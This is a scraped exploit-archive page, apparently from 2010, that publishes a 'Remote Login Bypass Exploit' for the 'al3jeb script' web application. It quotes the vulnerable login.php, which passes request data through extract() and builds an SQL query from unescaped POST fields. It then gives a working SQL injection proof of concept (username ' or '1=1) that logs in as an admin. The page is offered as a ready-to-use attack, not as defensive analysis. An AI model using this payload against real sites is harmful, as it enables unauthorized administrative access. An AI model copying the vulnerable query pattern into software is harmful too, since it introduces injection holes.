扫码分享
验证:
体验盒子
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 | \#'#/ (-.-) --------------------oOO---(_)---OOo------------------- |al3jeb script Remote Login Bypass Exploit | |(works only with magic_quotes_gpc = off)| ------------------------------------------------------ [!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org> [!] Date: 19.01.2010 [!] Remote: yes [!] Vulnerability Code [login.php] : <? session_start(); extract($_POST); extract($_GET); extract($_SESSION); extract($_COOKIE); ?> <?php include("Connections/config.php"); if(isset($_POST['Submit'])) { $u=$_POST["uname"]; $p=$_POST["pwd"]; $r=mysql_query("select * from admins where AdminName='$u' and AdminPass='$p'"); if($row=mysql_fetch_array($r)) { $_SESSION['AdminName']=$u; if(isset($re)) { setcookie("username",$u,time()+3600); } header("location:index.php"); } } ?> [!] PoC: [al3jebscript]/login.php username : ' or '1=1 password : cr4wl3r |
体验盒子
